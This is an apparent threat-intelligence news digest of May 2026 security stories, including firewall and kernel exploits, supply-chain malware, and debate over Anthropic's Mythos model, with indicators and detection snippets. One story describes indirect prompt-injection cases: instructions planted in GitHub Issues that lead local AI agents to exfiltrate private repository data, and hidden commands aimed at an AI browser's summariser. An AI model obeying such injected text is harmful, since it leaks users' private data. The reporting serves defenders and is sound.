Breaking News
New and updated threat intelligence stories from the last 24 hours, tracked and analyzed by Mallory.
New
Stories created in the last 24 hours
Active Exploitation of PAN-OS Captive Portal Flaw Gives Attackers Root on Firewalls
9
Palo Alto Networks disclosed **CVE-2026-0300**, a critical buffer overflow in the PAN-OS **User-ID Authentication Portal** (also called the Captive Portal) that is being exploited in the wild to achieve unauthenticated remote code execution with **root privileges**. The flaw is an out-of-bounds write triggered by specially crafted packets and affects exposed **PA-Series** and **VM-Series** firewalls running multiple PAN-OS 10.2, 11.1, 11.2, and 12.1 versions. Palo Alto assigned the issue a **CVSS 9.3** when the portal is reachable from the public internet or other untrusted networks, and **8.7** when access is limited to trusted internal IP addresses. The company said observed attacks have focused on Authentication Portal instances exposed to untrusted IP addresses, while **Prisma Access**, **Cloud NGFW**, and **Panorama** are not affected. At disclosure, fixes were not yet broadly available, with patch releases scheduled to begin in mid-May and continue through late May 2026. Palo Alto urged customers to immediately restrict portal access to trusted zones or internal IPs, or disable the Authentication Portal if it is not required, and said a **Threat Prevention Signature** for PAN-OS 11.1 and later was released as an added mitigation layer.
- May 6, 2026: Palo Alto announces patch rollout schedule for affected PAN-OS versions
- May 6, 2026: Palo Alto discloses CVE-2026-0300 under active exploitation
Trojanized DAEMON Tools Installers Used in Supply Chain Malware Attack
6
Official Windows installers for **DAEMON Tools** were compromised in a supply chain attack, with malicious versions distributed from the vendor’s legitimate website beginning on April 8. Kaspersky said the trojanized installers affected **DAEMON Tools Lite** versions `12.5.0.2421` through `12.5.0.2434`, were signed with valid AVB Disc Soft certificates, and implanted a staged backdoor that contacted the typosquatted command-and-control domain `env-check.daemontools[.]cc`. TechCrunch reported that an independently downloaded installer also appeared to contain the backdoor when scanned, while Disc Soft said it was investigating and taking remediation steps. Researchers observed thousands of infection attempts across more than 100 countries, but the attackers appear to have selectively escalated only a small number of victims in **Russia, Belarus, and Thailand**. Follow-on activity targeted organizations in the **government, scientific, manufacturing, and retail** sectors and included additional payloads such as an information stealer, an in-memory backdoor using **RC4**, and a more advanced **QUIC RAT**. Kaspersky said Chinese-language artifacts in the malware suggest a Chinese-speaking threat actor may be involved, though attribution remains unconfirmed, and urged defenders to hunt for related hashes, suspicious DAEMON Tools process activity, and communications with `env-check.daemontools[.]cc` and `38.180.107[.]76`.
- May 5, 2026: Disc Soft acknowledges report and starts remediation
- May 5, 2026: Kaspersky discovers active DAEMON Tools supply chain attack
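The network indicators above lend themselves to a quick log sweep. A minimal sketch in Python, assuming plain-text DNS/proxy log lines; the log format and function name are illustrative:

```python
import re

# Network IOCs from the Kaspersky reporting (defanged in the text above).
C2_DOMAIN = "env-check.daemontools.cc"
C2_IP = "38.180.107.76"
C2_PATTERN = re.compile(
    "|".join(re.escape(ioc) for ioc in (C2_DOMAIN, C2_IP))
)

def find_c2_hits(log_lines):
    """Return log lines that reference the known C2 domain or IP."""
    return [line for line in log_lines if C2_PATTERN.search(line)]

# Illustrative DNS/proxy log lines; the format is an assumption.
logs = [
    "2026-04-09 10:02:11 query A env-check.daemontools.cc",
    "2026-04-09 10:02:12 connect 38.180.107.76:443",
    "2026-04-09 10:03:00 query A www.daemon-tools.cc",
]
hits = find_c2_hits(logs)
```

Note the third line matches the vendor's legitimate hyphenated domain, not the typosquat, so it is correctly left unflagged.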
Silver Fox Phishing Campaign Delivers ValleyRAT and New ABCDoor Backdoor
3
The China-linked threat group **Silver Fox** ran a phishing campaign that impersonated tax authorities in India and Russia to infect organizations with **ValleyRAT** and a newly documented Python backdoor, **ABCDoor**. Researchers said the activity began with fake tax notices sent as PDF attachments that directed victims to download a malicious archive. That archive contained a modified Rust-based loader, **RustSL**, which used geofencing, environment checks, stealth features, and persistence mechanisms before deploying ValleyRAT and then ABCDoor. More than 1,600 malicious emails were observed between early January and early February 2026, with victims spanning the industrial, consulting, retail, and transportation sectors. Analysis tied ABCDoor to Silver Fox’s toolkit since at least late 2024, with confirmed operational use starting in early 2025. On infected Windows systems, the malware established persistence through the **Run** registry key and a scheduled task named **`AppClient`**, concealed files under **`C:\ProgramData\Tailscale`**, and abused **`pythonw.exe`** and **`ffmpeg.exe`** to blend in while enabling surveillance, remote interaction, module execution, command-and-control, and data exfiltration. Researchers also identified a new ValleyRAT plugin that acted as a loader for ABCDoor, showing the group is expanding a malware chain built for covert access and follow-on control.
- May 5, 2026: Researchers disclose Silver Fox's new ABCDoor malware
- May 5, 2026: Cisco Talos publicly attributes government intrusions to UAT-8302
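The persistence indicators above can be turned into a rough triage check. A minimal sketch, assuming process-creation events arrive as dictionaries; the event layout and helper names are illustrative, not a real EDR schema:

```python
# Triage helpers for the Silver Fox tradecraft described above:
# pythonw.exe / ffmpeg.exe running out of C:\ProgramData\Tailscale and a
# scheduled task named "AppClient".
SUSPECT_IMAGES = {"pythonw.exe", "ffmpeg.exe"}
SUSPECT_DIR = "c:\\programdata\\tailscale\\"

def flag_process(event):
    """Flag a process-creation event matching the reported indicators."""
    image = event.get("image", "").lower()
    name = image.rsplit("\\", 1)[-1]
    return name in SUSPECT_IMAGES and image.startswith(SUSPECT_DIR)

def flag_task(task_name):
    """Flag a scheduled-task name matching the reported persistence task."""
    return task_name.lower() == "appclient"

# Illustrative events: one matching the tradecraft, one benign.
events = [
    {"image": "C:\\ProgramData\\Tailscale\\pythonw.exe"},
    {"image": "C:\\Python312\\pythonw.exe"},
]
flags = [flag_process(e) for e in events]
```

Path-anchored matching matters here: both abused binaries are legitimate tools, so only their execution from the concealment directory is a meaningful signal.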
MuddyWater Disguised Espionage Intrusion as Chaos Ransomware Attack
2
Rapid7 assessed with moderate confidence that an intrusion initially presented as a **Chaos ransomware** incident was in fact a false-flag operation by the Iranian MOIS-linked group **MuddyWater** (also tracked as Seedworm). The attackers reportedly used **Microsoft Teams** social engineering, screen sharing, credential theft, and **MFA** manipulation to gain access, then deployed legitimate remote administration tools including **AnyDesk** and **DWAgent** to maintain persistence and move deeper into the environment, including toward a domain controller. Researchers said the operation diverged from a typical ransomware playbook because it emphasized long-term access, internal footholds, and data theft over disruptive encryption for profit. Rapid7 linked the activity to MuddyWater through overlapping infrastructure such as `moonzonet[.]com`, tradecraft consistent with prior operations, and use of the revoked **"Donald Gay"** code-signing certificate previously tied to MuddyWater malware including Stagecomp and Darkcomp. The intrusion also used a loader, `ms_upd.exe`, to deploy a custom backdoor, `Game.exe`, which masqueraded as a Microsoft WebView2 sample application and enabled command execution, file operations, and persistent shell access. Researchers concluded that the ransomware branding and extortion behavior were likely intended to delay attribution and mask espionage or prepositioning objectives, continuing a pattern in which MuddyWater uses criminal ransomware themes as operational cover.
- May 6, 2026: Rapid7 publishes analysis attributing the operation to MuddyWater
- Jan 1, 2026: Attackers deploy ms_upd.exe and Game.exe during the intrusion
Attackers Abuse Amazon SES to Send Phishing That Passes Email Authentication
2
Kaspersky reported a rise in phishing campaigns that abuse Amazon Simple Email Service (**SES**) to deliver convincing messages through trusted cloud infrastructure. The activity is believed to be fueled by exposed AWS Identity and Access Management (**IAM**) access keys discovered in public GitHub repositories, `.env` files, Docker images, backups, and public S3 buckets. After validating stolen credentials—reportedly with automated secret-scanning and access-checking workflows—attackers use SES to send bulk phishing emails that can pass **SPF**, **DKIM**, and **DMARC**, reducing the effectiveness of reputation-based filtering. Observed campaigns included fake **DocuSign** notifications that redirected targets to AWS-hosted credential-harvesting pages, as well as more advanced business email compromise attempts using fabricated email threads and fake invoices. Researchers urged organizations to enforce least-privilege IAM permissions, enable MFA, rotate keys regularly, apply IP-based access restrictions, and strengthen encryption controls around secrets. Amazon said it provides guidance for exposed credentials, responds to abuse reports, and directs suspected misuse of AWS resources to **AWS Trust & Safety**.
- May 4, 2026: Amazon issues response and abuse-reporting guidance
- May 4, 2026: Researchers link SES abuse to exposed AWS IAM credentials
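Exposed keys of this kind are often findable with a simple pattern match, since AWS access key IDs have a fixed shape: a four-character prefix ("AKIA" for long-term keys, "ASIA" for temporary STS keys) followed by 16 uppercase alphanumerics. A minimal pre-commit heuristic sketch; the function name is illustrative, and this is no substitute for a dedicated secret scanner:

```python
import re

# Coarse matcher for AWS access key IDs: AKIA/ASIA prefix plus 16
# uppercase alphanumerics. Secret *access keys* have no such fixed
# prefix and need entropy-based detection instead.
KEY_ID_RE = re.compile(r"\b(?:AKIA|ASIA)[0-9A-Z]{16}\b")

def scan_for_key_ids(text):
    """Return candidate AWS access key IDs found in a blob of text."""
    return KEY_ID_RE.findall(text)

# AWS's documented example key ID, as it might appear in a leaked .env file.
sample_env = "AWS_ACCESS_KEY_ID=AKIAIOSFODNN7EXAMPLE\nDEBUG=true\n"
found = scan_for_key_ids(sample_env)
```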
Oracle Shifts to Monthly Critical Security Patch Updates
2
Oracle said it will replace its quarterly security patching model with **monthly Critical Security Patch Updates** for ERP, database, and other software products, citing the faster pace of **AI-enabled vulnerability discovery**. The company said the new cadence is intended to shorten exposure windows as attackers and researchers use AI to identify software flaws more quickly. The first monthly release is scheduled for **May 28**, after which Oracle plans to move to a regular **third-Tuesday** schedule each month. Reported upcoming dates include **June 16, July 21, and August 18**. The move brings Oracle closer to the monthly patching approach already used by major software vendors including **Microsoft, SAP, and Adobe**, though those vendors typically release updates on the **second Tuesday** of the month.
- May 28, 2026: Oracle schedules first monthly Critical Security Patch Update
- May 5, 2026: Oracle announces shift from quarterly to monthly security patching
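The third-Tuesday cadence is easy to compute for planning purposes; a small Python sketch that reproduces the reported 2026 dates:

```python
import calendar
from datetime import date

def third_tuesday(year, month):
    """Return the date of the third Tuesday of a given month."""
    first_weekday = date(year, month, 1).weekday()  # Monday == 0
    days_to_first_tuesday = (calendar.TUESDAY - first_weekday) % 7
    return date(year, month, 1 + days_to_first_tuesday + 14)

# Reproduces the reported dates: June 16, July 21, and August 18, 2026.
dates = [third_tuesday(2026, m) for m in (6, 7, 8)]
```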
Security Flaws in Embodied AI Robots Raise Cyber-Physical Risk
1
Researchers warned that **embodied AI systems**—including humanoid and quadruped robots—are entering commercial, industrial, military, and critical infrastructure environments with weak security controls that could enable both digital compromise and real-world harm. The report highlighted documented issues in commercially available robots, particularly **Unitree** platforms, including an undocumented **CloudSail** remote-access backdoor, exposed APIs that could disclose device locations and camera feeds, Bluetooth and Wi-Fi provisioning weaknesses that could allow root access, and telemetry sent to external servers in China. The findings describe robots as high-risk **cyber-physical endpoints** because they combine cameras, microphones, radios, cloud connectivity, and physical actuation in a single platform. Researchers said those characteristics could allow wireless propagation, fleet-wide compromise, and even "physical botnets," while **vision-language model** prompt injection could manipulate robot behavior through physical-world inputs. The report urged organizations deploying robots in areas such as manufacturing, nuclear decommissioning, and military operations to strengthen procurement reviews, segment robot networks, monitor vulnerabilities, and prepare continuity plans before insecure architectures become embedded at scale.
- May 5, 2026: Recorded Future highlights systemic security risks in embodied AI robots
Recently Updated
Stories with a meaningful timeline update in the last 24 hours
CopyFail Linux Kernel AEAD Flaw Enables Local Privilege Escalation
123
Researchers disclosed **CVE-2026-31431**, dubbed **CopyFail**, a high-severity local privilege-escalation flaw in the Linux kernel's crypto subsystem affecting the `algif_aead` module through the `AF_ALG` socket interface. The bug was introduced in Linux `4.14` by commit `72548b093ee3`, which added in-place AEAD handling in `algif_aead.c`; because source and destination buffers came from different memory mappings, the change created a path to memory corruption. The oss-sec disclosure said an unprivileged local attacker could exploit the flaw with a working Python proof of concept to gain a controlled page-cache write primitive against readable files. That primitive could let attackers tamper with read-only files or `setuid` executables, potentially leading to privilege escalation or code execution. The issue has been fixed by reverting to out-of-place operation while preserving associated-data copying, with patches released in stable kernels `6.18.22`, `6.19.12`, and `7.0`. Public advisories rate the flaw **CVSS 7.8** (`AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H`) and recommend applying the stable kernel updates, restricting access to `AF_ALG`, and disabling or unloading the `algif_aead` module where it is not required.
- May 5, 2026: AF_ALG is reportedly deprecated and patch submitted to remove zero-copy support
- May 3, 2026: oss-sec warns namespaces are weak isolation for AF_ALG and similar socket families
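Until fleets are fully updated, a quick way to triage exposure is to compare running kernel versions against the fixed stable releases named above. A rough sketch, assuming mainline-style version strings; distro kernels backport fixes under their own versioning, so unknown series should be treated as needing vendor-specific review rather than assumed safe:

```python
# Stable releases carrying the CopyFail fix, per the advisory above.
FIXED_BY_SERIES = {(6, 18): (6, 18, 22), (6, 19): (6, 19, 12)}

def parse_version(version_string):
    """Parse 'X.Y.Z[-suffix]' into a tuple of ints for comparison."""
    return tuple(int(p) for p in version_string.split("-")[0].split(".")[:3])

def is_patched(kernel_version):
    """Rough check of a mainline-style version string against fixed releases."""
    v = parse_version(kernel_version)
    if v >= (7, 0):
        return True
    fixed = FIXED_BY_SERIES.get(v[:2])
    # Unknown series (e.g. older longterm trees) fall through to False,
    # i.e. "review required", not "confirmed vulnerable".
    return fixed is not None and v >= fixed
```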
Critical cPanel & WHM Authentication Flaw Exposes Servers to Unauthorized Access
53
cPanel disclosed a **critical login authentication vulnerability** in **cPanel & WHM** that can allow **unauthorized access** to affected servers, and released fixes for supported versions on April 28, 2026. Public technical details remain limited and no `CVE` had been assigned at the time of disclosure, but changelog references tied the issue to **session loading and saving** under `CPANEL-52908`. The flaw affects multiple supported release tiers, and cPanel urged administrators to upgrade immediately. Patched builds were issued for versions **110, 118, 126, 132, 134, and 136**, while unsupported or end-of-life deployments are also considered likely at risk. The exposure is significant because **WHM** is used for server administration and **cPanel** manages individual hosting accounts, meaning successful exploitation could compromise both administrative and tenant access paths. Security teams were advised to rapidly inventory internet-facing cPanel assets, identify impacted versions, and prioritize emergency remediation across hosted environments.
- May 4, 2026: Shadowserver reports 44,000 likely compromised cPanel/WHM IPs
- May 2, 2026: Unknown actor targets MSP and hosting networks with CVE-2026-41940
AI Governance and Risk Management Initiatives
46
Organizations and researchers are advancing **AI governance** and **risk management** efforts through new institutional programs, policy engagement, and conceptual frameworks aimed at addressing the societal, legal, and cybersecurity implications of increasingly capable AI systems. Anthropic announced the **Anthropic Institute**, consolidating teams focused on frontier model red teaming, societal impacts, and economic research, while also expanding its public policy presence to engage lawmakers on AI-related regulation and infrastructure issues. Broader discussion across the referenced materials reflects the same theme of embedding accountability into AI systems and developing governance strategies for AI risk. A forthcoming book by Sabira Arefin argues that ethics should be engineered into AI architecture rather than treated as an abstract principle, while the Knight First Amendment Institute article examines competing approaches to AI risk governance, including model-centric controls, testing, evaluation, and policy frameworks such as the **EU AI Act** and UN trustworthy AI initiatives. Taken together, the material offers substantive policy and governance analysis, although the book announcement is primarily promotional.
- May 5, 2026: Trump administration weighs executive order for formal AI model review
- May 5, 2026: Major U.S. AI labs agree to pre-release CAISI model testing
U.S. Regulators Warn Major Banks About Anthropic’s Mythos Cyber AI
35
U.S. Treasury Secretary Scott Bessent and Federal Reserve Chair Jerome Powell reportedly convened an urgent meeting with chief executives from major Wall Street banks to warn that Anthropic’s new AI model, **Mythos**, could accelerate the discovery and exploitation of previously unknown software flaws. The discussions included leaders from systemically important institutions such as Citigroup, Morgan Stanley, Bank of America, Wells Fargo, and Goldman Sachs, reflecting concern that advanced offensive cyber capabilities could create not only enterprise security problems but broader financial-stability risks. Anthropic has described Mythos as a model built for cybersecurity software engineering that can identify vulnerabilities across major operating systems, web browsers, and other software, and in some cases help assemble sophisticated exploits. The company did not broadly release the model, instead limiting access under **Project Glasswing** to roughly 40 technology firms including Microsoft and Google, while briefing U.S. officials and industry stakeholders on its risks and defensive uses. Officials are also weighing the implications for crypto and DeFi platforms, where low-cost, real-time zero-day discovery could increase the threat of disruptive attacks.
- May 6, 2026: SEBI issues Mythos cyber alert for India's securities sector
- Apr 28, 2026: Australian banks move to address Mythos-linked cyber risks
Instructure discloses cyber incident affecting Canvas services
29
Instructure, the U.S. education technology company behind the **Canvas** learning platform, disclosed that it recently suffered a cybersecurity incident involving a criminal threat actor and has engaged outside forensic experts to investigate the scope and impact. The company said it is still determining what systems or data were affected and has not yet confirmed whether service disruptions beginning May 1—including maintenance affecting **Canvas Data 2**, **Canvas Beta**, and tools dependent on API keys—are directly tied to the incident. The disclosure comes as education technology providers face sustained targeting because they hold large volumes of student and teacher information. Reporting around the incident notes that Instructure had already disclosed a separate **Salesforce-related** breach in September 2025 linked to social engineering, while external leak-site style listings have also associated the company with **ShinyHunters** claims that remain unverified. The latest incident also follows other major school technology breaches, including **PowerSchool** and **Infinite Campus**, underscoring continued pressure on the sector.
- May 5, 2026: Colorado Boulder, Rutgers, and Tilburg acknowledge Canvas incident
- May 5, 2026: ShinyHunters shares sample Instructure data with TechCrunch
Malicious code and prompt-injection attacks targeting developers and AI-agent ecosystems
24
Multiple reports describe **social-engineering and supply-chain style attacks** that trick developers or AI-agent users into executing attacker-controlled instructions. North Korean operators have been linked to the **“Contagious Interview”** campaign, in which fake recruiter personas lure software developers into running “technical interview” projects that deploy malware such as **BeaverTail** and **OtterCookie** for credential theft and remote access; GitLab reported banning **131 related accounts** in 2025, with many repos using **hidden loaders** that fetched payloads from third-party services (e.g., *Vercel*) rather than hosting malware directly. Separately, OpenGuardrails reported a campaign on *ClawHub* (an OpenClaw AI agent “skills” repository) where attackers posted **malicious troubleshooting comments** containing Base64-encoded commands that download a loader from `91[.]92[.]242[.]30`, remove macOS quarantine attributes, and install **Atomic macOS (AMOS) infostealer**—a delivery method that can evade package-focused scanning because the payload is in comments, not the skill artifact. Research and incident writeups also highlight how **indirect prompt injection** and **malicious open-source packages** can compromise developer environments. NSFOCUS summarized a GitHub **MCP cross-repository data leak** scenario where attacker-injected instructions in public Issues could cause locally running AI agents to exfiltrate private repo data when agents act with broad GitHub permissions, and cited a similar hidden-command issue affecting an AI browser’s page summarization workflow. JFrog reported malicious npm packages (e.g., `eslint-verify-plugin`, `duer-js`) delivering multi-stage payloads including a **macOS RAT** (Mythic/Apfell) and a Windows infostealer, reinforcing ongoing risk from poisoned dependencies. 
In contrast, a DFIR case study on **CVE-2023-46604** exploitation of Apache ActiveMQ leading to **LockBit**-style ransomware, and a Medium post on recon/content-discovery techniques, are separate topics and not part of the AI-agent/developer social-engineering thread.
- May 1, 2026: Researchers report Contagious Interview shift to malicious Git hooks
- Apr 29, 2026: Researchers expose Lazarus operator workstations via self-ingested exfiltration data
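The ClawHub comment technique described above, Base64-encoded commands hidden in otherwise plausible troubleshooting text, can be approximated with a decode-and-inspect heuristic. A minimal sketch; the token list and length threshold are illustrative, and the example URL uses a documentation address rather than the real infrastructure:

```python
import base64
import re

# Heuristic modeled on the reported comment payloads: a long Base64 run
# that decodes to a download/install command chain (curl fetch plus
# macOS quarantine-attribute removal).
SUSPICIOUS_TOKENS = ("curl ", "xattr", "chmod +x", "bash -c")
B64_CANDIDATE = re.compile(r"[A-Za-z0-9+/=]{40,}")

def decode_candidates(text):
    """Yield ASCII decodings of long Base64-looking runs in text."""
    for match in B64_CANDIDATE.findall(text):
        try:
            yield base64.b64decode(match, validate=True).decode("ascii")
        except Exception:
            continue

def is_suspicious_comment(text):
    """True if the comment hides a Base64-encoded command chain."""
    return any(
        any(tok in decoded for tok in SUSPICIOUS_TOKENS)
        for decoded in decode_candidates(text)
    )

# Benign-looking comment wrapping an encoded fetch-and-dequarantine chain
# (192.0.2.10 is a documentation IP, standing in for the real C2).
payload = base64.b64encode(
    b"curl -o /tmp/loader http://192.0.2.10/x && xattr -c /tmp/loader"
).decode()
comment = "Try reinstalling first, then run: " + payload
```

Because the payload lives in free-text comments rather than the skill artifact, this kind of content-level check complements package-focused scanning instead of duplicating it.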
Iran-Linked Hybrid Threats to Middle East Digital and Maritime Infrastructure
20
Escalation in the **Iran-US-Israel conflict** is disrupting regional digital and communications infrastructure through both direct threats and indirect operational impacts. Iran-linked activity has reportedly expanded from military retaliation rhetoric to threats against major U.S. technology companies' facilities in the Middle East, including sites associated with **Microsoft, Amazon, Google, Oracle, IBM, and Nvidia**, while earlier attacks were said to have caused outages at **AWS** datacenters in the UAE and Bahrain. In parallel, maritime traffic near the **Strait of Hormuz** has experienced anomalies consistent with **GNSS spoofing** and other electronic warfare techniques, with vessels reporting false positions and receiving radio warnings that could be used to shape shipping behavior without a formal blockade. The same regional instability is also affecting subsea connectivity projects. Meta's **2Africa** cable build has been delayed after **Alcatel Submarine Networks** declared force majeure and said it could no longer safely operate in the Persian Gulf, leaving the *Pearls* segment incomplete despite most cable having already been laid. Together, the reporting indicates a broader pattern in which conflict around Iran is creating cyber-physical risk across **cloud infrastructure, maritime navigation, and undersea communications**, increasing the likelihood of service disruption, delayed repairs, higher operating costs, and reduced confidence in critical regional infrastructure.
- May 5, 2026: Mass GPS jamming and dark vessel buildup hit Fujairah-Hormuz corridor
- May 4, 2026: U.S. launches Project Freedom to guide neutral shipping in Hormuz
Debate Over Kids Online Safety Act and Age-Verification Requirements for Minors
14
Policymakers in multiple jurisdictions are advancing **child online safety** rules that would restrict minors’ access to social media, “addictive” product features, and certain content (including pornography), increasing pressure on platforms to implement **age assurance/age verification** to determine users’ ages before allowing access. The Lawfare analysis highlights that while protecting children online is a widely shared goal, enforcing age-based restrictions at scale effectively requires collecting and validating age signals for *all* users—raising significant implementation, privacy, and governance challenges as governments consider measures such as the **Kids Online Safety Act (KOSA)**, the **Kids Off Social Media Act**, and the **App Store Accountability Act**.
- May 6, 2026: UK age-gating expansion advances after Children’s Wellbeing bill clears Parliament
- May 6, 2026: Utah age-verification law takes effect with VPN circumvention provisions
Multiple Linux Kernel Vulnerabilities Prompt dCERT Advisories
14
dCERT published two advisories, `2025-1332` and `2025-1527`, warning of **multiple vulnerabilities in the Linux kernel**. The notices indicate that separate sets of kernel flaws were significant enough to warrant dedicated advisories, underscoring continued security risk in one of the most widely deployed operating system components across servers, cloud infrastructure, appliances, and embedded systems. While no public synopsis was included in the referenced advisories, the alerts point organizations to review affected kernel versions, assess exposure across Linux-based assets, and apply vendor-provided updates or mitigations. Because kernel vulnerabilities can affect core system security boundaries and stability, unpatched systems may face elevated risk depending on the specific flaws and deployment context.
- May 6, 2026: dCERT publishes Linux Kernel multiple-vulnerability advisory 2026-1361
- Apr 28, 2026: dCERT publishes Linux Kernel multiple-vulnerability advisory 2026-1273
+ 29 more recently updated
Zerion and KelpDAO link security incidents to DPRK TraderTraitor activity
12
Zerion published a **security incident post-mortem**, and LayerZero later issued a **KelpDAO incident statement**, with both incidents being publicly tied in threat-intelligence discussion to **DPRK** activity. Social-media reporting around the disclosures specifically associated the KelpDAO case with **TraderTraitor**, the North Korean cluster known for targeting cryptocurrency and Web3 organizations through social engineering and wallet compromise. The available references do not provide technical indicators, loss figures, or a detailed attack chain, but they place both disclosures in the context of crypto-focused intrusions attributed to North Korean operators. For CISOs in digital-asset, DeFi, and wallet ecosystems, the incidents reinforce the ongoing risk from DPRK-linked campaigns that exploit trusted workflows, third-party relationships, and user-facing transaction processes to gain access and move funds.
- May 6, 2026: KelpDAO publishes LayerZero bridge hack clarification
Growing Use of LLMs to Automate Offensive Security and Threat Intelligence Workflows
12
Multiple security researchers and vendors reported rapid adoption of **LLM-driven automation** across both offensive and defensive security workflows, with a focus on turning traditionally manual, expert-led tasks into semi- or fully-automated pipelines. Black Lantern Security described how “agentic” LLM tooling is being positioned as a terminal-native partner for offensive security engineers, potentially orchestrating common testing stacks and accelerating repetitive penetration testing activities, while also introducing new operational and safety challenges. On the defensive side, SentinelOne detailed using LLMs to extract and contextualize data from narrative **cyber threat intelligence (CTI)** reporting, converting unstructured prose into structured entities/relationships (e.g., IOCs and inferred links) for downstream detection and response workflows, and discussed trade-offs versus non-LLM pattern-matching approaches. Separately, an independent researcher described using LLMs for **vulnerability research** end-to-end—claiming discovery of multiple real-world vulnerabilities without manual source review—by applying AI-assisted techniques such as differential and grammar-based fuzzing and automated harness generation against widely used projects (e.g., Parse Server, HonoJS, ElysiaJS).
- Apr 23, 2026: Include Security says AI agents reshaped BSidesSF 2026 CTF results
U.S. Defense AI Policy Disputes Over Guardrails and Autonomous Weapons
12
A widening **U.S. defense AI policy conflict** is unfolding over how far military and national-security agencies should push artificial intelligence into weapons and related systems while reducing safeguards. Reporting on the Pentagon’s posture says the Defense Department is seeking major funding for autonomous systems and accelerating battlefield AI adoption even as experts warn that oversight, operational testing, and civilian-harm mitigation mechanisms are being weakened. A separate court filing shows that dispute has moved into litigation: the Trump administration is defending the Pentagon’s decision to blacklist **Anthropic** after the company refused to remove restrictions on use of its models for **autonomous weapons** or domestic surveillance, framing the issue as a supply-chain and contracting matter rather than retaliation. Other references are adjacent to the same broad policy debate but do not describe the same specific event. One is a discussion of **AI and nuclear command-and-control risks**, including U.S.-China agreement that AI should not decide nuclear use; it is relevant as background on military AI guardrails, but it is not about the Pentagon funding push or the Anthropic lawsuit itself. Another covers a **counter-drone laser** safety test at White Sands involving FAA coordination and automated shutdown behavior; despite its defense-technology focus, it concerns directed-energy testing rather than the policy and legal fight over AI guardrails, and is tracked separately.
- May 5, 2026: Trump administration drafts policy to limit vendor restrictions on government AI use
Anthropic Mythos AI Tool Spurs Cybersecurity Alarm in Healthcare and Government
11
Anthropic’s **Mythos** vulnerability research model has drawn scrutiny over its potential to dramatically compress exploit development timelines, raising fears that attackers could move from discovery to weaponization in hours or minutes instead of days or months. Healthcare security experts warned that hospitals are particularly exposed because they depend on legacy clinical systems, connected medical devices, and operational technology that are difficult to patch and often lack modern protections. The concern comes as the healthcare and public health sector reportedly endured **460 ransomware attacks in 2025**, the highest total among critical infrastructure sectors in the FBI’s IC3 reporting, intensifying worries about patient safety, service outages, and faster coordinated ransomware campaigns. At the same time, officials and industry leaders are weighing whether Mythos-class tools could strengthen defense by improving anomaly detection, vulnerability prioritization, code and configuration review, legacy device testing, and incident response. In Washington, the Office of Management and Budget said it is **not** currently changing policy to give federal agencies access to Mythos, even as the White House examines the model’s cyber implications and coordinates with providers, industry, and the intelligence community on guardrails for any possible modified release. The debate is unfolding alongside broader friction between Anthropic and the administration, including litigation tied to a Pentagon supply chain risk designation and an order directing agencies to remove Anthropic tools from federal networks.
- May 5, 2026: European MEPs urge stronger EU cyber defenses after Mythos concerns
Vimeo links customer data exposure to Anodot supply-chain breach
12
Vimeo said a security incident exposed some user and customer data through a compromise at third-party analytics vendor **Anodot**, and linked the activity to the **ShinyHunters** cybercriminal ecosystem. According to Vimeo, the accessed information primarily included technical data, video titles and metadata, and in some cases customer email addresses; the company said video content, user login credentials, and payment card data were **not** accessed. ShinyHunters subsequently added Vimeo to its leak site and threatened to publish the data if a ransom was not paid. Vimeo said it disabled Anodot credentials, removed the Anodot integration, engaged external security experts, and notified law enforcement while continuing its investigation. The company said its services were not disrupted, and reporting indicates the incident may be part of a broader **supply-chain compromise** involving Anodot that could affect multiple customers, consistent with recent ShinyHunters operations that have relied heavily on voice and email phishing to gain access rather than exploiting software vulnerabilities.
- May 5, 2026: ShinyHunters leaks Vimeo data; HIBP counts 119,200 exposed emails
ScarCruft Compromised sqgame.net to Deliver BirdCall Spyware on Android and Windows
10
North Korea-linked **ScarCruft** (also tracked as **APT37** and **Reaper**) compromised the gaming platform `sqgame[.]net` to distribute trojanized software carrying its **BirdCall** backdoor, according to reporting based on ESET research. The operation targeted users tied to the Yanbian Korean Autonomous Prefecture in China, a region associated with North Korean defector transit, and likely focused on defectors, activists, and related communities. Researchers said the campaign appears to have begun in late 2024, with attackers likely breaching the site’s web server and repackaging legitimate Android game APKs rather than stealing source code. The malicious Android apps deployed a mobile variant of BirdCall capable of stealing contacts, SMS messages, call logs, files, media, and private keys, while also taking screenshots and recording ambient audio. Reporting also said ScarCruft briefly trojanized a Windows desktop client update component: a malicious `mono.dll` fetched **RokRAT**, which then installed the Windows BirdCall payload. BirdCall is described as an evolution of RokRAT and supports surveillance features including keystroke logging, clipboard theft, shell execution, and screenshot capture on Windows, while its Android command-and-control traffic blended into normal network activity and could use cloud services such as **Zoho WorkDrive**, **pCloud**, and **Yandex Disk**.
- May 5, 2026: Cisco Talos discloses UAT-8302 and publishes IOCs
Weaver E-cology Flaws Expose Servers to Unauthenticated RCE and File Read
9
Weaver (Fanwei) **E-cology** deployments are affected by two high-severity vulnerabilities that allow unauthenticated attackers to compromise exposed servers. **`CVE-2026-22679`** impacts E-cology **10.0** versions prior to **20260312** and enables remote code execution through the `/papi/esearch/data/devops/dubboApi/debug/method` endpoint, where attacker-controlled `interfaceName` and `methodName` POST parameters can abuse exposed debug functionality to run arbitrary commands. The issue is classified as **CWE-306** and carries high impact across confidentiality, integrity, and availability, with exploitation observed in the wild by the Shadowserver Foundation. A second flaw, **`CVE-2022-50992`**, affects E-cology **9.5** versions prior to **10.52** and allows unauthenticated arbitrary file reads through the **`XmlRpcServlet`** XML-RPC interface. Attackers can supply file paths to the `WorkflowService.getAttachment` and `WorkflowService.LoadTemplateProp` methods to retrieve sensitive files from the server, including configuration data and database credentials. The vulnerability is mapped to **CWE-22**, and Shadowserver reported exploitation evidence dating back to 2022, underscoring continued exposure risk for internet-facing E-cology systems that remain unpatched.
- Apr 30, 2026: VulnCheck receives disclosure for Weaver E-cology 9.5 file-read flaw
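As a triage aid, web server access logs can be grepped for the two endpoints named in this story. A minimal sketch in Python; note that the debug endpoint path comes from the CVE-2026-22679 reporting, while matching on the bare `XmlRpcServlet` name is an assumption, since the exact URL mapping may vary per deployment:

```python
# Log-triage sketch for the E-cology flaws described above.
SUSPECT_PATHS = (
    "/papi/esearch/data/devops/dubboApi/debug/method",  # CVE-2026-22679 (RCE)
    "XmlRpcServlet",                                    # CVE-2022-50992 (file read); path is an assumption
)

def flag_ecology_requests(log_lines):
    """Return access-log lines touching the suspect E-cology endpoints (case-insensitive)."""
    return [line for line in log_lines
            if any(p.lower() in line.lower() for p in SUSPECT_PATHS)]
```

A hit is only a starting point for investigation: the RCE endpoint may also appear in legitimate administrative traffic on unpatched systems.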
Malicious AI Agent Skills Abused for Crypto Theft and macOS AMOS Delivery
